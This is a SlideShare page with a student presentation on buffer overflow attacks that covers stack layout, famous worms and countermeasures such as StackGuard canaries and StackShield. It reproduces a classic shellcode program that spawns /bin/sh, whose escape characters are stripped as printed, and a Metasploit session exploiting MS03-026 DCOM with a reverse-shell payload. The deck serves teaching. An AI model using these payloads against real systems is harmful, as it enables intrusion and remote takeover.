SlideShare una empresa de Scribd logo

Buffer overflow attacks

Descargar como PPTX, PDF
Kapil Nagrale
Kapil Nagrale

Presentation on buffer overflow attack

Educación
1 de 18
BUFFER OVERFLOW ATTACKS Submitted By : Kapil Nagrale M.tech FY Software Engineering Roll No : 132190015
OUTLINE        INTRODUCTION STACK BASIS HOW IT WORKS ? IMPLEMENTING WITH METASPLOIT COUNTERMEASURES CONCLUSION REFERENCES
INTRODUCTION  What is buffer overflow? More data is put into a holding area than it can handle. Cause: Lack of bound checking (eg: standard C library )  An Intrusion or a Successful Attack aims to change the flow of control ( using buffer overflow), letting the attacker execute arbitrary code
INTRODUCTION  Morris worm (November 1988) Used finger Daemon to overflow buffer  Code Red worm (July 2001)  Slammer Worm (Jan 2003) Exploits the vulnerability in Microsoft SQL Server 2000
STACK BASICS Lower Memory Addresses Local Variables Old Base Pointer Return Address Higher Memory Address Arguments
HOW IT WORKS? void main() { int x; x = 0; function(1,2,3); x = 1; void function( int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; printf( "%dn",x); } ret = buffer1 + 12; (*ret) += 8; } This function jumps over the x=1 assignment directly to the printf() and prints the value as 0. The offsets (12, 8 used above ) are machine-dependant.
CONTINUED What do you do after overflowing the buffer?  Inject some code into the victim. Make the function return to this code  Spawning a shell  void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); }  Dump the executable of the above execve() command and store it in a buffer
char shellcode[] = "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" "x80xe8xdcxffxffxff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; // Fill the large_string Array with the address of the buffer // (shell code) for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; // Copy shell code to the beginning of large_string for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; // Copy large_string onto buffer. This overflows the return address // and execs a shell strcpy(buffer,large_string); }
In a real security attack, malicious code usually comes form  environment variable  user input  network connection List of unsafe functions in the standard C library  strcpy()  strcat()  getwd()  gets()  fscanf()  scanf()  sprintf()
IMPLEMENTING WITH METASPLOIT  What is Metasploit? The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing .
TERMINOLOGIES  Exploit : Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access).  Payload : A payload is the program or code that is delivered to the victim system.  Session : Connection from successful exploit  LHOST : LOCAL HOST  RHOST : REMOTE HOST
IMPLEMENTATION          msf > use exploit/windows/dcerpc/ms03_026_dcom msf > show options msf > set RHOST 10.0.0.3 msf >show payloads msf >set PAYLOAD generic/shell_reverse_tcp msf >set LHOST 10.0.0.6 msf > exploit sessions –i 1 It will give a comman shell of victim’s computer on msfconsole. If the vulnerable program has root privileges one can have complete access to system.
COUNTERMEASURES  Array Bounds Checking While injecting code is optional for a buffer overflow attack, the corruption of control flow is essential. Thus unlike non-executable buffers, array bounds checking completely stops buffer overflow vulnerabilities and attacks. If arrays cannot be overflowed at all, then array overflows cannot be used to corrupt adjacent program state.
STACK GUARD METHOD DETECTING RETURN ADDRESS CHANGE: CANARY Place a Canary word before the return Address When the function returns, it first checks to see that the “CANARY WORD” is intact before jumping to the address pointed to by the return address
STACK SHIELD  Global Ret Stack Whenever a function call is made, the return address being pushed onto the normal stack is at the same time copied into the Global Ret Stack array. The Global Ret Stack has by default 256 entries, which limits the nesting depth to 256 function calls  RET Range Check It uses a global variable to store the return address of the current function.  Protecting Function Pointers Add checking code before all function calls that make use of function pointers to make sure that the function pointer does not point to parts of memory other than text segment.
CONCLUSION  The best available tool is effective against only 50% of the attacks. Often these tools incur undesirable performance overheads.  Even if we start writing the best of code from this point of time, there is still millions of code lines of “Legacy Code” out there which is vulnerable.  StackGuard is a systematic compiler tool that prevents a broad class of buffer overflow security attacks from succeeding.
REFERENCES  Conference on Software Security : Aleph One, Smashing the Stack for Fun and Profit. Originally published in Phrack 4914.1996  IEEE Reference : Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade*  The 7th International Conference on Computer Science & Education (ICCSE 2012)The Principle and Prevention of Windows Buffer Overflow  Pincus, Jonathan,”Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns”, IEEE Security&Privacy
Q&A

Recomendados

Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Joe McCarthy
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
Evgeni Tsonev
 
Buffer Overflows
Buffer OverflowsBuffer Overflows
Buffer Overflows
Sumit Kumar
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
6 buffer overflows
6 buffer overflows6 buffer overflows
6 buffer overflows
drewz lin
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
Abu Juha Ahmed Muid
 
Xss attack
Xss attackXss attack
Xss attack
Manjushree Mashal
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 

Recomendados

Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Joe McCarthy
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
Evgeni Tsonev
 
Buffer Overflows
Buffer OverflowsBuffer Overflows
Buffer Overflows
Sumit Kumar
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
6 buffer overflows
6 buffer overflows6 buffer overflows
6 buffer overflows
drewz lin
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
Abu Juha Ahmed Muid
 
Xss attack
Xss attackXss attack
Xss attack
Manjushree Mashal
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 
Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9
koolkampus
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
amiable_indian
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
Albena Asenova-Belal
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion Attacks
Raghav Bisht
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
OWASP Delhi
 
Garbage collection
Garbage collectionGarbage collection
Garbage collection
Somya Bagai
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best Practices
Maxime ALAY-EDDINE
 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attacks
harshal kshatriya
 
Program security
Program securityProgram security
Program security
G Prachi
 
OPERATING SYSTEM SECURITY
OPERATING SYSTEM SECURITYOPERATING SYSTEM SECURITY
OPERATING SYSTEM SECURITY
RohitK71
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilities
ebusinessmantra
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
Michael Furman
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 
CNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeCNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: Shellcode
Sam Bowne
 
Format String Attack
Format String AttackFormat String Attack
Format String Attack
Mayur Mallya
 
C programming interview questions
C programming interview questionsC programming interview questions
C programming interview questions
adarshynl
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
Scott Hurrey
 
Cyber Security Vulnerabilities
Cyber Security VulnerabilitiesCyber Security Vulnerabilities
Cyber Security Vulnerabilities
Siemplify
 
Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101
Zack Meyers
 
Dc 12 Chiueh
Dc 12 ChiuehDc 12 Chiueh
Dc 12 Chiueh
wollard
 
20100309 03 - Vulnerability analysis (McCabe)
20100309 03 - Vulnerability analysis (McCabe)20100309 03 - Vulnerability analysis (McCabe)
20100309 03 - Vulnerability analysis (McCabe)
LeClubQualiteLogicielle
 

Más contenido relacionado

La actualidad más candente

Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9
koolkampus
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 

La actualidad más candente (20)

Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion Attacks
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
Garbage collection
Garbage collectionGarbage collection
Garbage collection
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best Practices
 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attacks
 
Program security
Program securityProgram security
Program security
 
OPERATING SYSTEM SECURITY
OPERATING SYSTEM SECURITYOPERATING SYSTEM SECURITY
OPERATING SYSTEM SECURITY
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilities
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
CNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeCNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: Shellcode
 
Format String Attack
Format String AttackFormat String Attack
Format String Attack
 
C programming interview questions
C programming interview questionsC programming interview questions
C programming interview questions
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Cyber Security Vulnerabilities
Cyber Security VulnerabilitiesCyber Security Vulnerabilities
Cyber Security Vulnerabilities
 
Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101
 

Similar a Buffer overflow attacks

Dc 12 Chiueh
Dc 12 ChiuehDc 12 Chiueh
Dc 12 Chiueh
wollard
 
Debugging With Id
Debugging With IdDebugging With Id
Debugging With Id
guest215c4e
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
webhostingguy
 
1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx 1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx
aryan532920
 
DefCon 2012 - Rooting SOHO Routers
DefCon 2012 - Rooting SOHO RoutersDefCon 2012 - Rooting SOHO Routers
DefCon 2012 - Rooting SOHO Routers
Michael Smith
 
Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?
Javier Tallón
 
Report on hacking blind
Report on hacking blindReport on hacking blind
Report on hacking blind
NikitaAndhale
 

Similar a Buffer overflow attacks (20)

Dc 12 Chiueh
Dc 12 ChiuehDc 12 Chiueh
Dc 12 Chiueh
 
20100309 03 - Vulnerability analysis (McCabe)
20100309 03 - Vulnerability analysis (McCabe)20100309 03 - Vulnerability analysis (McCabe)
20100309 03 - Vulnerability analysis (McCabe)
 
Return oriented programming (ROP)
Return oriented programming (ROP)Return oriented programming (ROP)
Return oriented programming (ROP)
 
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1 Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
 
Debugging With Id
Debugging With IdDebugging With Id
Debugging With Id
 
Finding Diversity In Remote Code Injection Exploits
Finding Diversity In Remote Code Injection ExploitsFinding Diversity In Remote Code Injection Exploits
Finding Diversity In Remote Code Injection Exploits
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx 1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx
 
Reverse shell
Reverse shellReverse shell
Reverse shell
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
 
Software Security
Software SecuritySoftware Security
Software Security
 
DefCon 2012 - Rooting SOHO Routers
DefCon 2012 - Rooting SOHO RoutersDefCon 2012 - Rooting SOHO Routers
DefCon 2012 - Rooting SOHO Routers
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730
 
Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
Advanced malwareanalysis training session2 botnet analysis part1
Advanced malwareanalysis training session2 botnet analysis part1Advanced malwareanalysis training session2 botnet analysis part1
Advanced malwareanalysis training session2 botnet analysis part1
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflow
 
Report on hacking blind
Report on hacking blindReport on hacking blind
Report on hacking blind
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 

Último

IATP How-to Foreign Travel May 2024.pdff
IATP How-to Foreign Travel May 2024.pdffIATP How-to Foreign Travel May 2024.pdff
IATP How-to Foreign Travel May 2024.pdff
17thcssbs2
 

Último (20)

B.ed spl. HI pdusu exam paper-2023-24.pdf
B.ed spl. HI pdusu exam paper-2023-24.pdfB.ed spl. HI pdusu exam paper-2023-24.pdf
B.ed spl. HI pdusu exam paper-2023-24.pdf
 
The Art Pastor's Guide to Sabbath | Steve Thomason
The Art Pastor's Guide to Sabbath | Steve ThomasonThe Art Pastor's Guide to Sabbath | Steve Thomason
The Art Pastor's Guide to Sabbath | Steve Thomason
 
Salient features of Environment protection Act 1986.pptx
Salient features of Environment protection Act 1986.pptxSalient features of Environment protection Act 1986.pptx
Salient features of Environment protection Act 1986.pptx
 
....................Muslim-Law notes.pdf
....................Muslim-Law notes.pdf....................Muslim-Law notes.pdf
....................Muslim-Law notes.pdf
 
PART A. Introduction to Costumer Service
PART A. Introduction to Costumer ServicePART A. Introduction to Costumer Service
PART A. Introduction to Costumer Service
 
50 ĐỀ LUYỆN THI IOE LỚP 9 - NĂM HỌC 2022-2023 (CÓ LINK HÌNH, FILE AUDIO VÀ ĐÁ...
50 ĐỀ LUYỆN THI IOE LỚP 9 - NĂM HỌC 2022-2023 (CÓ LINK HÌNH, FILE AUDIO VÀ ĐÁ...50 ĐỀ LUYỆN THI IOE LỚP 9 - NĂM HỌC 2022-2023 (CÓ LINK HÌNH, FILE AUDIO VÀ ĐÁ...
50 ĐỀ LUYỆN THI IOE LỚP 9 - NĂM HỌC 2022-2023 (CÓ LINK HÌNH, FILE AUDIO VÀ ĐÁ...
 
Pragya Champions Chalice 2024 Prelims & Finals Q/A set, General Quiz
Pragya Champions Chalice 2024 Prelims & Finals Q/A set, General QuizPragya Champions Chalice 2024 Prelims & Finals Q/A set, General Quiz
Pragya Champions Chalice 2024 Prelims & Finals Q/A set, General Quiz
 
Dementia (Alzheimer & vasular dementia).
Dementia (Alzheimer & vasular dementia).Dementia (Alzheimer & vasular dementia).
Dementia (Alzheimer & vasular dementia).
 
How to Manage Notification Preferences in the Odoo 17
How to Manage Notification Preferences in the Odoo 17How to Manage Notification Preferences in the Odoo 17
How to Manage Notification Preferences in the Odoo 17
 
Morse OER Some Benefits and Challenges.pptx
Morse OER Some Benefits and Challenges.pptxMorse OER Some Benefits and Challenges.pptx
Morse OER Some Benefits and Challenges.pptx
 
IATP How-to Foreign Travel May 2024.pdff
IATP How-to Foreign Travel May 2024.pdffIATP How-to Foreign Travel May 2024.pdff
IATP How-to Foreign Travel May 2024.pdff
 
slides CapTechTalks Webinar May 2024 Alexander Perry.pptx
slides CapTechTalks Webinar May 2024 Alexander Perry.pptxslides CapTechTalks Webinar May 2024 Alexander Perry.pptx
slides CapTechTalks Webinar May 2024 Alexander Perry.pptx
 
Operations Management - Book1.p - Dr. Abdulfatah A. Salem
Operations Management - Book1.p - Dr. Abdulfatah A. SalemOperations Management - Book1.p - Dr. Abdulfatah A. Salem
Operations Management - Book1.p - Dr. Abdulfatah A. Salem
 
Advances in production technology of Grapes.pdf
Advances in production technology of Grapes.pdfAdvances in production technology of Grapes.pdf
Advances in production technology of Grapes.pdf
 
The Benefits and Challenges of Open Educational Resources
The Benefits and Challenges of Open Educational ResourcesThe Benefits and Challenges of Open Educational Resources
The Benefits and Challenges of Open Educational Resources
 
How to the fix Attribute Error in odoo 17
How to the fix Attribute Error in odoo 17How to the fix Attribute Error in odoo 17
How to the fix Attribute Error in odoo 17
 
INU_CAPSTONEDESIGN_비밀번호486_업로드용 발표자료.pdf
INU_CAPSTONEDESIGN_비밀번호486_업로드용 발표자료.pdfINU_CAPSTONEDESIGN_비밀번호486_업로드용 발표자료.pdf
INU_CAPSTONEDESIGN_비밀번호486_업로드용 발표자료.pdf
 
Post Exam Fun(da) Intra UEM General Quiz 2024 - Prelims q&a.pdf
Post Exam Fun(da) Intra UEM General Quiz 2024 - Prelims q&a.pdfPost Exam Fun(da) Intra UEM General Quiz 2024 - Prelims q&a.pdf
Post Exam Fun(da) Intra UEM General Quiz 2024 - Prelims q&a.pdf
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
Danh sách HSG Bộ môn cấp trường - Cấp THPT.pdf
Danh sách HSG Bộ môn cấp trường - Cấp THPT.pdfDanh sách HSG Bộ môn cấp trường - Cấp THPT.pdf
Danh sách HSG Bộ môn cấp trường - Cấp THPT.pdf
 

Buffer overflow attacks

  • 1. BUFFER OVERFLOW ATTACKS Submitted By : Kapil Nagrale M.tech FY Software Engineering Roll No : 132190015
  • 2. OUTLINE        INTRODUCTION STACK BASIS HOW IT WORKS ? IMPLEMENTING WITH METASPLOIT COUNTERMEASURES CONCLUSION REFERENCES
  • 3. INTRODUCTION  What is buffer overflow? More data is put into a holding area than it can handle. Cause: Lack of bound checking (eg: standard C library )  An Intrusion or a Successful Attack aims to change the flow of control ( using buffer overflow), letting the attacker execute arbitrary code
  • 4. INTRODUCTION  Morris worm (November 1988) Used finger Daemon to overflow buffer  Code Red worm (July 2001)  Slammer Worm (Jan 2003) Exploits the vulnerability in Microsoft SQL Server 2000
  • 5. STACK BASICS Lower Memory Addresses Local Variables Old Base Pointer Return Address Higher Memory Address Arguments
  • 6. HOW IT WORKS? void main() { int x; x = 0; function(1,2,3); x = 1; void function( int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; printf( "%dn",x); } ret = buffer1 + 12; (*ret) += 8; } This function jumps over the x=1 assignment directly to the printf() and prints the value as 0. The offsets (12, 8 used above ) are machine-dependant.
  • 7. CONTINUED What do you do after overflowing the buffer?  Inject some code into the victim. Make the function return to this code  Spawning a shell  void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); }  Dump the executable of the above execve() command and store it in a buffer
  • 8. char shellcode[] = "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" "x80xe8xdcxffxffxff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; // Fill the large_string Array with the address of the buffer // (shell code) for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; // Copy shell code to the beginning of large_string for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; // Copy large_string onto buffer. This overflows the return address // and execs a shell strcpy(buffer,large_string); }
  • 9. In a real security attack, malicious code usually comes form  environment variable  user input  network connection List of unsafe functions in the standard C library  strcpy()  strcat()  getwd()  gets()  fscanf()  scanf()  sprintf()
  • 10. IMPLEMENTING WITH METASPLOIT  What is Metasploit? The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing .
  • 11. TERMINOLOGIES  Exploit : Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access).  Payload : A payload is the program or code that is delivered to the victim system.  Session : Connection from successful exploit  LHOST : LOCAL HOST  RHOST : REMOTE HOST
  • 12. IMPLEMENTATION          msf > use exploit/windows/dcerpc/ms03_026_dcom msf > show options msf > set RHOST 10.0.0.3 msf >show payloads msf >set PAYLOAD generic/shell_reverse_tcp msf >set LHOST 10.0.0.6 msf > exploit sessions –i 1 It will give a comman shell of victim’s computer on msfconsole. If the vulnerable program has root privileges one can have complete access to system.
  • 13. COUNTERMEASURES  Array Bounds Checking While injecting code is optional for a buffer overflow attack, the corruption of control flow is essential. Thus unlike non-executable buffers, array bounds checking completely stops buffer overflow vulnerabilities and attacks. If arrays cannot be overflowed at all, then array overflows cannot be used to corrupt adjacent program state.
  • 14. STACK GUARD METHOD DETECTING RETURN ADDRESS CHANGE: CANARY Place a Canary word before the return Address When the function returns, it first checks to see that the “CANARY WORD” is intact before jumping to the address pointed to by the return address
  • 15. STACK SHIELD  Global Ret Stack Whenever a function call is made, the return address being pushed onto the normal stack is at the same time copied into the Global Ret Stack array. The Global Ret Stack has by default 256 entries, which limits the nesting depth to 256 function calls  RET Range Check It uses a global variable to store the return address of the current function.  Protecting Function Pointers Add checking code before all function calls that make use of function pointers to make sure that the function pointer does not point to parts of memory other than text segment.
  • 16. CONCLUSION  The best available tool is effective against only 50% of the attacks. Often these tools incur undesirable performance overheads.  Even if we start writing the best of code from this point of time, there is still millions of code lines of “Legacy Code” out there which is vulnerable.  StackGuard is a systematic compiler tool that prevents a broad class of buffer overflow security attacks from succeeding.
  • 17. REFERENCES  Conference on Software Security : Aleph One, Smashing the Stack for Fun and Profit. Originally published in Phrack 4914.1996  IEEE Reference : Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade*  The 7th International Conference on Computer Science & Education (ICCSE 2012)The Principle and Prevention of Windows Buffer Overflow  Pincus, Jonathan,”Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns”, IEEE Security&Privacy
  • 18. Q&A